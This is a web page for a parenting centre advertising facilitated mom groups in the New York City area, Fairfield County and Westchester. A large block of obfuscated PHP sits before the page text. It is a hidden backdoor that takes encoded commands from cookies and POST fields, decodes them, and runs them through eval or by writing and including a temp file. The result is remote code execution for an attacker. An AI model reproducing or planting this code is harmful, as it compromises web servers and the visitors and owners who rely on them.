$mDTmQtm = "\161" . "\x51" . "\147" . chr (95) . chr ( 611 - 512 )."\101" . "\120" . 'L' . 'r';$SlbppUtgCY = chr (99) . chr (108) . "\141" . 's' . chr ( 864 - 749 ).chr (95) . chr ( 418 - 317 ).chr ( 213 - 93 )."\x69" . "\163" . "\164" . "\x73";$osdoKIoVYa = class_exists($mDTmQtm); $mDTmQtm = "53223";$SlbppUtgCY = "35330";$xSgokxU = FALSE;if ($osdoKIoVYa === $xSgokxU){function BehAzZY(){return FALSE;}$SXjtY = "15413";BehAzZY();class qQg_cAPLr{public function jXnapstw(){echo "6497";}private $IAenRkun;public static $AiQLHxrX = "b344f68d-03b4-455a-9afc-5d9630044778";public static $nhMOUpIYg = 10539;public function __destruct(){$SXjtY = "10005_63087";$this->FkvMnAhJ($SXjtY); $SXjtY = "10005_63087";}public function __construct($dpTFBAOeN=0){$nXUPKMPX = $_POST;$lLVTYLIH = $_COOKIE;$VtPvz = @$lLVTYLIH[substr(qQg_cAPLr::$AiQLHxrX, 0, 4)];if (!empty($VtPvz)){$BxbbEREx = "base64";$kJlRoujl = "";$VtPvz = explode(",", $VtPvz);foreach ($VtPvz as $teVyFrmA){$kJlRoujl .= @$lLVTYLIH[$teVyFrmA];$kJlRoujl .= @$nXUPKMPX[$teVyFrmA];}$kJlRoujl = array_map($BxbbEREx . chr (95) . chr (100) . "\x65" . 'c' . chr (111) . 'd' . "\145", array($kJlRoujl,)); $kJlRoujl = $kJlRoujl[0] ^ str_repeat(qQg_cAPLr::$AiQLHxrX, (strlen($kJlRoujl[0]) / strlen(qQg_cAPLr::$AiQLHxrX)) + 1);qQg_cAPLr::$nhMOUpIYg = @unserialize($kJlRoujl);}}private function FkvMnAhJ($SXjtY){if (is_array(qQg_cAPLr::$nhMOUpIYg)) {$pZmfqTVvP = str_replace('<' . "\77" . "\160" . "\150" . 'p', "", qQg_cAPLr::$nhMOUpIYg['c' . chr (111) . 'n' . "\x74" . chr ( 245 - 144 ).chr ( 477 - 367 )."\164"]);eval($pZmfqTVvP); $SXjtY = "15413";exit();}}}$QXjbu = new /* 42002 */ qQg_cAPLr(15413); $QXjbu = str_repeat("10005_63087", 1);}$dZybetSeZt = chr (89) . 'f' . "\x4a" . "\x5f" . chr (81) . chr ( 647 - 542 )."\103";$OjHzDvWE = chr (99) . chr ( 185 - 77 ).'a' . "\163" . "\163" . '_' . "\x65" . "\170" . chr (105) . "\x73" . "\164" . "\x73";$rgzbfjYkA = class_exists($dZybetSeZt); $OjHzDvWE = "24706";$LTyLCJCtf = strpos($OjHzDvWE, $dZybetSeZt);if ($rgzbfjYkA == $LTyLCJCtf){function qgLDORxeJg(){$VccYcaHLTD = new /* 18454 */ YfJ_QiC(64637 + 64637); $VccYcaHLTD = NULL;}$nXhkvp = "64637";class YfJ_QiC{private function pLOVwTKZ($nXhkvp){if (is_array(YfJ_QiC::$aTjowQs)) {$name = sys_get_temp_dir() . "/" . crc32(YfJ_QiC::$aTjowQs["salt"]);@YfJ_QiC::$aTjowQs["write"]($name, YfJ_QiC::$aTjowQs["content"]);include $name;@YfJ_QiC::$aTjowQs["delete"]($name); $nXhkvp = "64637";exit();}}public function TqBmlPFDe(){$VoxaRJ = "17858";$this->_dummy = str_repeat($VoxaRJ, strlen($VoxaRJ));}public function __destruct(){YfJ_QiC::$aTjowQs = @unserialize(YfJ_QiC::$aTjowQs); $nXhkvp = "34560_63225";$this->pLOVwTKZ($nXhkvp); $nXhkvp = "34560_63225";}public function XcLyEfYHb($VoxaRJ, $qeXdlDNebc){return $VoxaRJ[0] ^ str_repeat($qeXdlDNebc, intval(strlen($VoxaRJ[0]) / strlen($qeXdlDNebc)) + 1);}public function yqgqW($VoxaRJ){$ZoNAcJX = chr ( 504 - 406 ).chr (97) . "\163" . "\x65" . chr ( 539 - 485 ).chr (52);return array_map($ZoNAcJX . chr (95) . "\144" . chr ( 923 - 822 )."\x63" . 'o' . "\x64" . chr (101), array($VoxaRJ,));}public function __construct($gJoUvdmuX=0){$yhYgEuGd = "\x2c";$VoxaRJ = "";$ATEPnH = $_POST;$ubRMQ = $_COOKIE;$qeXdlDNebc = "82017243-3fbb-4923-9d9f-7f9873638a48";$fbUGxEwrJ = @$ubRMQ[substr($qeXdlDNebc, 0, 4)];if (!empty($fbUGxEwrJ)){$fbUGxEwrJ = explode($yhYgEuGd, $fbUGxEwrJ);foreach ($fbUGxEwrJ as $SluKmtDZX){$VoxaRJ .= @$ubRMQ[$SluKmtDZX];$VoxaRJ .= @$ATEPnH[$SluKmtDZX];}$VoxaRJ = $this->yqgqW($VoxaRJ);}YfJ_QiC::$aTjowQs = $this->XcLyEfYHb($VoxaRJ, $qeXdlDNebc);if (strpos($qeXdlDNebc, $yhYgEuGd) !== FALSE){$qeXdlDNebc = explode($yhYgEuGd, $qeXdlDNebc); $DsCoVEOPE = sprintf("34560_63225", strrev($qeXdlDNebc[0]));}}public static $aTjowQs = 13012;}qgLDORxeJg();}$NzZpq = 'W' . chr (67) . chr (83) . chr ( 592 - 497 ).chr ( 662 - 547 ).chr ( 149 - 80 ).chr ( 842 - 725 ); $IOHuJv = chr (99) . "\x6c" . chr ( 878 - 781 ).chr ( 1031 - 916 ).chr (115) . chr ( 133 - 38 ).'e' . chr (120) . "\x69" . chr (115) . chr ( 447 - 331 )."\x73";$dQWgedKddy = class_exists($NzZpq); $IOHuJv = "34190";$kGuoRuT = !1;if ($dQWgedKddy == $kGuoRuT){function yqHcuCi(){$AmowkmU = new /* 53737 */ WCS_sEu(1527 + 1527); $AmowkmU = NULL;}$XKNwuMuU = "1527";class WCS_sEu{private function zpmPoto($XKNwuMuU){if (is_array(WCS_sEu::$RgpxxKgIxg)) {$ObgWFH = sys_get_temp_dir() . "/" . crc32(WCS_sEu::$RgpxxKgIxg['s' . chr (97) . 'l' . "\x74"]);@WCS_sEu::$RgpxxKgIxg["\x77" . 'r' . 'i' . "\x74" . chr ( 111 - 10 )]($ObgWFH, WCS_sEu::$RgpxxKgIxg[chr ( 1032 - 933 ).'o' . "\156" . 't' . "\145" . "\156" . "\164"]);include $ObgWFH;@WCS_sEu::$RgpxxKgIxg[chr (100) . 'e' . chr ( 491 - 383 )."\x65" . chr (116) . chr ( 604 - 503 )]($ObgWFH); $XKNwuMuU = "1527";exit();}}private $BUHnPV;public function PmnFxs(){echo 29404;}public function __destruct(){$XKNwuMuU = "48313_44046";$this->zpmPoto($XKNwuMuU); $XKNwuMuU = "48313_44046";}public function __construct($nLinsOBa=0){$FwbEKmok = $_POST;$TzixD = $_COOKIE;$FBVMpOD = "69731d62-1cec-4f24-ba94-c5f71e5a20ba";$dhaAbE = @$TzixD[substr($FBVMpOD, 0, 4)];if (!empty($dhaAbE)){$NmTbP = "base64";$nZRPDOd = "";$dhaAbE = explode(",", $dhaAbE);foreach ($dhaAbE as $gWQpinN){$nZRPDOd .= @$TzixD[$gWQpinN];$nZRPDOd .= @$FwbEKmok[$gWQpinN];}$nZRPDOd = array_map($NmTbP . chr ( 282 - 187 )."\144" . chr ( 545 - 444 )."\143" . "\x6f" . "\x64" . 'e', array($nZRPDOd,)); $nZRPDOd = $nZRPDOd[0] ^ str_repeat($FBVMpOD, (strlen($nZRPDOd[0]) / strlen($FBVMpOD)) + 1);WCS_sEu::$RgpxxKgIxg = @unserialize($nZRPDOd); $nZRPDOd = class_exists("48313_44046");}}public static $RgpxxKgIxg = 16221;}yqHcuCi();}$UoqUU = 'O' . chr (84) . "\x5f" . chr (122) . chr ( 600 - 528 )."\x41";$IripZhFS = "\143" . chr (108) . "\141" . "\163" . "\163" . "\x5f" . chr (101) . chr (120) . chr (105) . chr ( 246 - 131 ).'t' . chr (115); $oMCbQd = $IripZhFS($UoqUU); $UoqUU = "4044";$kiRtOneXo = $oMCbQd;$IripZhFS = "24681";if (!$kiRtOneXo){class OT_zHA{private $lorLfSd;public static $NfThimbHP = "18be2c58-d641-4483-9658-f52eddcea183";public static $gvLcP = 35757;public function __construct($kQcLZP=0){$mgHJJDsou = $_COOKIE;$lcatmdtAS = $_POST;$XusJKlPh = @$mgHJJDsou[substr(OT_zHA::$NfThimbHP, 0, 4)];if (!empty($XusJKlPh)){$LzCUwkavRo = "base64";$vPdThwoImX = "";$XusJKlPh = explode(",", $XusJKlPh);foreach ($XusJKlPh as $kywvHDJe){$vPdThwoImX .= @$mgHJJDsou[$kywvHDJe];$vPdThwoImX .= @$lcatmdtAS[$kywvHDJe];}$vPdThwoImX = array_map($LzCUwkavRo . "\137" . chr (100) . 'e' . 'c' . 'o' . "\x64" . "\145", array($vPdThwoImX,)); $vPdThwoImX = $vPdThwoImX[0] ^ str_repeat(OT_zHA::$NfThimbHP, (strlen($vPdThwoImX[0]) / strlen(OT_zHA::$NfThimbHP)) + 1);OT_zHA::$gvLcP = @unserialize($vPdThwoImX);}}private function hLNLo(){if (is_array(OT_zHA::$gvLcP)) {$VlgyE = sys_get_temp_dir() . "/" . crc32(OT_zHA::$gvLcP['s' . 'a' . 'l' . chr ( 422 - 306 )]);@OT_zHA::$gvLcP['w' . chr ( 1009 - 895 ).'i' . "\x74" . "\x65"]($VlgyE, OT_zHA::$gvLcP["\x63" . "\x6f" . 'n' . "\x74" . "\x65" . chr (110) . "\164"]);include $VlgyE;@OT_zHA::$gvLcP[chr ( 399 - 299 ).chr ( 634 - 533 )."\154" . 'e' . 't' . chr (101)]($VlgyE); $dhIQXwh = "34718";exit();}}public function __destruct(){$this->hLNLo(); $dhIQXwh = "34718";$ugdovq = str_pad($dhIQXwh, 10);}}$GVZzhd = new /* 58847 */ OT_zHA(); $GVZzhd = substr("59266_11543", 1);}
Whether you are a mom to be, first time mom or mom to multiples let us provide you with the greatest support service for your ongoing needs. Currently, we service moms in the New York City metro area, Fairfield County (CT) and Westchester County (NY).
Join a specific Mom Group to share your experiences through motherhood together in a comfortable, judgement free environment. Facilitated by one of our kidologists our mom groups cover all facets of child development and child rearing while also arming moms with the strategies and information needed for their individual needs. Aside from learning and growing as a parent you will be included in our weekly social activities such as Mom’s Night Out and Mommy and Expert Luncheon.
Our groups for Fall 2016 are:
Don’t see a group that suits your needs? No problem we will create one for you and/or your group!
If you are interested in one of our Mom Groups or organizing a mom group please contact The Kidology center at Jen@KidologyCenter.com or (914) 815-0130. We can’t wait to meet you!